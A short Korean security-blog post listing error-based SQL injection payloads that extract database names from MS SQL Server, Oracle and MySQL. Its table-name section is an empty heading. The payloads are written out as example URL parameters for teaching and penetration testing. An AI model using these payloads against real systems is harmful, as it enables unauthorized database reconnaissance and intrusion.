Notice
Recent Posts
Recent Comments
Link
일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | |||
5 | 6 | 7 | 8 | 9 | 10 | 11 |
12 | 13 | 14 | 15 | 16 | 17 | 18 |
19 | 20 | 21 | 22 | 23 | 24 | 25 |
26 | 27 | 28 | 29 | 30 | 31 |
Tags
- x-pack
- PlayBook
- Windows
- docker
- elastic stack
- xe guest utilities
- 로그인불가
- GitLab
- centos 8
- G-suite
- Kibana server is not ready yet
- Elasticsearch
- freebsd
- 한글가이드
- pfsense
- bash
- Proxy
- endpoint security
- 보안양파
- hardening
- XCP-ng
- Kibana
- ssh key 배포
- ansible
- application security
- miniconda
- ELASTIC
- proxycfg
- macos
Archives
- Today
- Total
선 밖에 선 자유인
[SQL Injection] DBMS별 데이터 베이스명 및 테이블 추출 본문
** 데이터 베이스명 추출
- MS SQL Server
db_name() 함수를 이용
ex) idx=1' and db_name>0--
- Oracle
global_name 이용
ex) idx=1' and utl_inaddr.get_host_name(select global_name from global_name) <>1--
- MySQL
존재하지 않는 함수 이용
ex) idx='1 and abc()>0#
** 테이블명 추출
Comments